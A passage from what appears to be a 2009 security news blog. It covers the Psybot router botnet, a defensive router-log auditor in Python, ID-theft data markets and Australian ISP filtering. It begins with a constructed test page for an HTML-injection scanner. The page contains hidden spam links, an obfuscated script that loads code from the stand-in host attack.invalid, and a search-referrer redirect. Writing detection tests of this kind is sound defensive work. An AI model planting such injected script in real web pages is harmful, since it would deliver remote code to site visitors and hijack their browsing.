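INJECTED_PAGE = """<html><body>
<h1>Community Gardening Club</h1><p>Meeting minutes for March.</p>
<div style="position:absolute; left:-9999px">
<a href="http://example.invalid/1">breaking news</a> <a href="http://example.invalid/2">celebrity video</a>
<a href="http://example.invalid/3">free antivirus</a> <a href="http://example.invalid/4">tax refund</a>
<a href="http://example.invalid/5">trending search</a> <a href="http://example.invalid/6">movie download</a>
lottery results weather warning storm sport scores stock tips
</div>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fattack.invalid%2Fx.js%22%3E%3C%2Fscript%3E'));</script>
<script>if(document.referrer.indexOf('google')>-1){window.location='http://attack.invalid/scan.html';}</script>
</body></html>"""

# Constructed sample: the same page without the injection.
CLEAN_PAGE = """<html><body><h1>Community Gardening Club</h1>
<p>Meeting minutes for March.</p><script>console.log("loaded");</script></body></html>"""

if __name__ == "__main__":
    print(scan_html(INJECTED_PAGE))
    print(scan_html(CLEAN_PAGE))
```

Run over a site's own pages from a crawler or a content-management backup, this kind of check catches the injection from the owner's side; the referrer test in the second sample script is also why site owners often never see the redirect when they browse their own pages directly.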

Psybot: Botnet Based on Home Network Routers

Via H-Online.

DroneBL, a distributed DNS Blacklist service, says in a recent blog post that a botnet named Psybot gained control of approximately one hundred thousand routers and that it became a victim of a distributed denial-of-service (DDoS) attack that was carried out by this botnet.

A botnet consisting primarily of routers is actually rather unusual. Usually Windows PCs are enslaved to act like zombies in a botnet. Psybot seems to have specialised in attacking small home network routers that run an embedded Linux for MIPS CPUs.

According to a description [.pdf] by Terry Baume, the Netcomm NB5 is one of the main targets. Baume says that for older versions of the DSL modem with router functionality, the web interface and an SSH port were directly accessible from the internet; access didn't even require a password. While this problem was later solved with a firmware update, it is questionable whether this update was installed on all the routers.

More here.
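The exposure Baume describes (admin web interface and SSH reachable from the WAN side, with no password) is something a router's own logs show long before a botnet turns up. The Python below is an added example, not H-Online's or Baume's and not tied to the Netcomm NB5; it reads a constructed syslog-style excerpt in a format assumed for the example (httpd and dropbear lines with a `from <ip>` field), treats only RFC 1918 sources as the home LAN, and flags every administrative contact from anywhere else, rating unauthenticated web-admin hits and successful SSH logins from the internet as critical.

```python
import ipaddress
import re
from collections import Counter

# Assumption for this example: RFC 1918 ranges are the home LAN; any other
# source reached the router from its internet side.
LAN_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Log line shape assumed for this example (constructed, not a real NB5 format):
#   Mar 20 03:14:55 router httpd[412]: GET /admin/index.html from 203.0.113.55 auth=none
LINE_RE = re.compile(r"^(?P<ts>\w{3} +\d+ [\d:]+) \S+ (?P<svc>httpd|dropbear)\[\d+\]: (?P<msg>.*)$")
SRC_RE = re.compile(r"\bfrom (?P<ip>(?:\d{1,3}\.){3}\d{1,3})")


def from_lan(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LAN_NETS)


def classify(svc, msg):
    """Return (is_admin_event, is_critical) for one log message."""
    if svc == "httpd":
        parts = msg.split()
        path = parts[1] if len(parts) > 1 else ""
        if not path.startswith("/admin"):
            return False, False
        return True, "auth=none" in msg          # admin page served without login
    if svc == "dropbear":
        return True, "auth succeeded" in msg     # any SSH contact counts, login is critical
    return False, False


def audit(log_text):
    """Alerts for administrative contact that did not come from the LAN."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        src = SRC_RE.search(m["msg"])
        if not src or from_lan(src["ip"]):
            continue
        admin, critical = classify(m["svc"], m["msg"])
        if not admin:
            continue
        alerts.append({
            "time": m["ts"],
            "source": src["ip"],
            "service": m["svc"],
            "severity": "critical" if critical else "high",
            "event": m["msg"],
        })
    return alerts


def by_source(alerts):
    """Count alerts per external address, to see who is probing."""
    return dict(Counter(a["source"] for a in alerts))


# Constructed sample log; 203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges standing in for internet addresses.
SAMPLE_LOG = """\
Mar 20 03:12:01 router httpd[412]: GET /admin/status.html from 192.168.1.10 auth=ok
Mar 20 03:14:55 router httpd[412]: GET /admin/index.html from 203.0.113.55 auth=none
Mar 20 03:15:02 router httpd[412]: POST /admin/firmware.cgi from 203.0.113.55 auth=none
Mar 20 03:15:30 router dropbear[517]: Child connection from 198.51.100.7:41822
Mar 20 03:15:33 router dropbear[517]: Password auth succeeded for 'admin' from 198.51.100.7:41822
Mar 20 03:20:44 router dropbear[517]: Password auth succeeded for 'admin' from 192.168.1.10:50211
"""

if __name__ == "__main__":
    for a in audit(SAMPLE_LOG):
        print(a["severity"].upper(), a["time"], a["source"], a["service"], a["event"])
    print(by_source(audit(SAMPLE_LOG)))
```

The two LAN lines produce nothing; the four WAN lines produce alerts, and the firmware upload without authentication is exactly the kind of event the firmware update mentioned above was meant to make impossible. On a device that forwards syslog to a PC this runs as a cron job; on one that does not, the fix is the same either way, which is to bind the admin interface and SSH to the LAN side and apply the vendor update.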

Security Fix: Web Fraud 2.0 - Data Search Tools for ID Thieves

Brian Krebs writes on Security Fix:

Data such as your Social Security number, mother's maiden name and credit card balance are not as difficult for ID thieves to find as most people think. I've recently learned that cyber crooks are providing cheap, instant access to detailed consumer databases, offering identity thieves the ability to find missing data as they compile dossiers on targeted individuals.

Security Fix spent the past week testing services offered by two Web sites that sell access to a wealth of information on consumers. Each site offers free registration, but requires users to fund their accounts via Webmoney, a PayPal-like virtual currency that is popular in Russia and Eastern Europe.

I enlisted the help of a half-dozen volunteers who agreed to let me try to find their personal and financial data on these sites. For a payment of $3 each, I was able to find full Social Security numbers on four of the volunteers, as well as their most recent street addresses and birthdays.

More here.

Sunday, March 22, 2009

Classic xkcd: No Pun Intended

Click for larger image.

We love xkcd.


- ferg

Australia: iiNet Pulls Out of Internet Filter Trials

Mitchell Bingemann writes on Australian IT:

iiNet has pulled out of the federal Government's Internet filtering trials.

iiNet only agreed to participate in the trial to demonstrate that the filter was flawed and a waste of taxpayers’ money, iiNet managing director Michael Malone said.

Mr Malone cited drawn-out negotiations with the Department of Broadband, Communications and the Digital Economy (DBCDE), constant changes in policy, and last week’s leak of a secret Internet blacklist as reasons for pulling out.

"It became increasingly clear that the trial was not simply about restricting child pornography or other such illegal material, but a much wider range of issues including what the Government simply describes as ‘unwanted material’ without an explanation of what that includes," Mr Malone said.

iiNet's withdrawal from the ISP filter trials is another blow for the controversial project. Last week the federal Government's plans for the nationwide internet filter were put in jeopardy when its top-secret blacklist of banned web pages was leaked.

The list is currently being used as the backbone of the Government's Internet filter trial of which phase one is being conducted by Primus Telecommunications, Tech 2U, Webshield, OMNIconnect, Netforce and Highway 1.

More here.

In Passing: Jade Goody

Jade Goody
5 June 1981 – 22 March 2009

Quote of The Day: William S. Lind

"Airstrikes serve as one of the most effective recruiting tools of America's opponents in Afghanistan, both because of the civilians killed and because when you attack someone from an invulnerable position -- that is to say, an altitude of 20,000 feet above the ground -- you make him want to fight you all the more."

- William S. Lind, writing in a commentary piece for UPI.